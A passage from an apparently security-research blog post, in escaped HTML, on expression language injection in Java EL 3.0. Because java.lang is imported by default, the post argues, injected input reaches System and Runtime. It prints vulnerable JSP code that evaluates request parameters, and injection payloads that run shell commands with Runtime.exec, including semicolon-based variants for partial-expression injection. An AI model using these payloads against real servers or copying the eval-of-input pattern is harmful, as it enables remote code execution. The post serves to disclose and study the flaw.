developers to &lt;b&gt;explicitly &lt;/b&gt;import classes and packages to be used in the
EL3 scripts, the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;java.lang&lt;/span&gt;&lt;/b&gt; package was
included by &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;default&lt;/span&gt;&lt;/b&gt;, to enable the
typical developer to gain access to &lt;b&gt;static &lt;/b&gt;type object and methods such
as &lt;b&gt;Boolean.TRUE&lt;/b&gt; and &lt;b&gt;Integer.numberOfTrailingZeros&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
They enabled access &lt;b&gt;by default&lt;/b&gt; to the static members of classes
in &lt;b&gt;JAVA.LANG&lt;/b&gt;, as in the java.lang package that includes &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;java.lang.System&lt;/span&gt;&lt;/b&gt; and &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;java.lang.Runtime&lt;/span&gt;&lt;/b&gt;!&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;JAVA.LANG!&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Seems like somebody there confused &quot;user friendly&quot; with
&quot;hacker friendly&quot; &lt;span style=&quot;font-family: Wingdings; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;&quot;&gt;J&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: Wingdings; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
So, if for some reason, a user controlled input would stumble into an
EL3 eval clause, which for some reason java is encouraging users to use in many
platforms such as JSF, CDI, Avatar and many CMSs, than attackers could do a &lt;b&gt;LOT&lt;/b&gt;
more with no requirements on specific imports -&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input1&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;System.getProperties()&lt;/span&gt;&lt;/b&gt;&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELManager&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input1&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input1&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  sys = elp.eval(&lt;b&gt;input1&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(sys);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJY__qkHtlGi8YY-DrjbHrLGr4F7fsiY6q0-8bKpGkSoVm86Ua5SGz0Sn_BN-qa6CJz0A46-LrbTEcRvxuTwyTqOLLWhQyhKbLioB2jtNiwvJad7Zd9ui-9uRL8kfPXDtrjGIZCxL8Lmo/s1600/JavaSystemInfo.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJY__qkHtlGi8YY-DrjbHrLGr4F7fsiY6q0-8bKpGkSoVm86Ua5SGz0Sn_BN-qa6CJz0A46-LrbTEcRvxuTwyTqOLLWhQyhKbLioB2jtNiwvJad7Zd9ui-9uRL8kfPXDtrjGIZCxL8Lmo/s1600/JavaSystemInfo.png&quot; height=&quot;142&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shapetype id=&quot;_x0000_t75&quot;
 coordsize=&quot;21600,21600&quot; o:spt=&quot;75&quot; o:preferrelative=&quot;t&quot; path=&quot;m@4@5l@4@11@9@11@9@5xe&quot;
 filled=&quot;f&quot; stroked=&quot;f&quot;&gt;
 &lt;v:stroke joinstyle=&quot;miter&quot;/&gt;
 &lt;v:formulas&gt;
  &lt;v:f eqn=&quot;if lineDrawn pixelLineWidth 0&quot;/&gt;
  &lt;v:f eqn=&quot;sum @0 1 0&quot;/&gt;
  &lt;v:f eqn=&quot;sum 0 0 @1&quot;/&gt;
  &lt;v:f eqn=&quot;prod @2 1 2&quot;/&gt;
  &lt;v:f eqn=&quot;prod @3 21600 pixelWidth&quot;/&gt;
  &lt;v:f eqn=&quot;prod @3 21600 pixelHeight&quot;/&gt;
  &lt;v:f eqn=&quot;sum @0 0 1&quot;/&gt;
  &lt;v:f eqn=&quot;prod @6 1 2&quot;/&gt;
  &lt;v:f eqn=&quot;prod @7 21600 pixelWidth&quot;/&gt;
  &lt;v:f eqn=&quot;sum @8 21600 0&quot;/&gt;
  &lt;v:f eqn=&quot;prod @7 21600 pixelHeight&quot;/&gt;
  &lt;v:f eqn=&quot;sum @10 21600 0&quot;/&gt;
 &lt;/v:formulas&gt;
 &lt;v:path o:extrusionok=&quot;f&quot; gradientshapeok=&quot;t&quot; o:connecttype=&quot;rect&quot;/&gt;
 &lt;o:lock v:ext=&quot;edit&quot; aspectratio=&quot;t&quot;/&gt;
&lt;/v:shapetype&gt;&lt;v:shape id=&quot;Picture_x0020_1&quot; o:spid=&quot;_x0000_i1025&quot; type=&quot;#_x0000_t75&quot;
 style=&#39;width:408.6pt;height:90.6pt;visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\Shay\AppData\Local\Temp\msohtmlclip1\01\clip_image001.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Also, Instead of using the System class, we can use the &lt;b&gt;Runtime&lt;/b&gt;
static class methods to &lt;b&gt;&lt;i&gt;&lt;span style=&quot;color: red;&quot;&gt;execute shell commands&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;.
For example:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input1&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Runtime.getRuntime().exec(&#39;mkdir
  abcde&#39;).waitFor()&lt;/span&gt;&lt;/b&gt;&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELManager&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input1&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input1&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  sys = elp.eval(&lt;b&gt;input1&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(sys);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
An impact similar to that of the Spring&#39;s counterpart of EL injection,
only in mainstream Java.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Cool. Now we can shamelessly classify the attack and rest.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;But there&#39;s more!&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Although scenarios in which the user&#39;s input will get full control of
the entire EL string are possible, they are much less common than scenarios in
which user input might be integrated as a &lt;b&gt;part of an EL string&lt;/b&gt;, in which
case most of the previously mentioned payloads won&#39;t work.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
However, EL 3.0 was kind enough to present us with &lt;b&gt;NEW&lt;/b&gt; operators,
one of which is the infamous semicolon (;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
As its SQL counterpart functionality suggests, the semicolon delimiter
can be used in EL 3 to close one expression, and add additional expressions,
with or without logical relations to &lt;b&gt;each other&lt;/b&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Think adding multiple lines of code to a single attack payload. Think
injecting payloads into the middle of expression, while using techniques
similar to &lt;b&gt;blind SQL injection&lt;/b&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Don&#39;t think. Here&#39;s a couple of examples:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input1&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;; Runtime.getRuntime().exec(&#39;mkdir aaaaa12&#39;).waitFor()&lt;/span&gt;&lt;/b&gt;&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELManager&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input1&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input1&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  sys = elp.eval((&quot;&lt;b&gt;&lt;span style=&quot;color: #7030a0;&quot;&gt;&#39;Welcome&#39;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;+&lt;/b&gt;
  &lt;b&gt;input1&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(sys);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0rzWOvRzByi4ZvN-qICesecxHC-8YdILOrUUo1lGQB-mJzy5HbpS1RzW0VToqJJsQS1IOhUhxfKbkqdbf3gBNW8mjm6TjIlUjEoNE99EuuTBRwMxsOP54YQ0xuCDc8e6vMlyYP7zf6U8/s1600/javaBlindRCE-Mkdir.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0rzWOvRzByi4ZvN-qICesecxHC-8YdILOrUUo1lGQB-mJzy5HbpS1RzW0VToqJJsQS1IOhUhxfKbkqdbf3gBNW8mjm6TjIlUjEoNE99EuuTBRwMxsOP54YQ0xuCDc8e6vMlyYP7zf6U8/s1600/javaBlindRCE-Mkdir.png&quot; height=&quot;168&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input1&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;1); Runtime.getRuntime().exec(&#39;mkdir jjjbc12&#39;).waitFor(&lt;/span&gt;&lt;/b&gt;&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELManager&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input1&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input1&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  sys = elp.eval((&quot;&lt;b&gt;&lt;span style=&quot;color: #7030a0;&quot;&gt;SomeClass.StaticMethod(&lt;/span&gt;&lt;/b&gt;
  &lt;b&gt;+&lt;/b&gt; &lt;b&gt;input1&lt;/b&gt; &lt;b&gt;+ &quot;)&quot;&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
